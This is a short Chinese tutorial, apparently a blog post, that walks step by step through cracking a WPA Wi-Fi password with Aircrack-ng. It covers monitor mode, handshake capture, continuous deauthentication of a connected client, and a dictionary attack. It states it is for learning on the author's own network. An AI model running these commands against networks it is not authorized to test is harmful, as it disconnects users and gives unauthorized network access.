声明:只做密码爆破学习,不用于破坏,本文测试的是自己的wifi。
本文使用Aircrack-ng破解,当然也可以用fluxion
首先,我们要有一个能连接Linux虚拟机,并且能监听网络的无线网卡
插入无线网卡,连接到kali虚拟机
Ifconfig 查看网卡是否识别
出现vlan0就是已识别
可以先airmon-ng命令查看无线网卡列表
然后开启网卡监听 airmon-ng start wlan0
出现mac80211这些代表监听成功
再次ifconfig,确认监听成功
发现wlan0的名字变成了wlan0mon,变成了监听模式
扫描附近的wifi
airodump-ng wlan0mon
CH是信道,就像车道一样,如果1车道车满了,就可以去2车道,以此类推
选择wifi的mac地址,及抓包保存路径
airodump-ng --bssid 6C:B1:58:39:A1:16 -c 11 -w /home wlan0mon
–bssid 路由器的mac地址
-c 信道
-w 抓包保存地址
下面D2:99:EE:FD:F8:7E是正在连接改wifi的设备MAC
抓包
重新打开一个界面(因为前面的监听不能停),输入命令
aireplay-ng -0 0 -a 路由器的mac -c 连接设备的mac wlan0mon
aireplay-ng -0 0 -a 6C:B1:58:39:A1:16 -c D2:99:EE:FD:F8:7E
发现监听这里create了一个包
cp /home-02.cap /home/kali/Desktop
选择保存的包,开始爆破
aircrack-ng -w /home/kali/Desktop/wifi.txt /home-02.cap
发现密码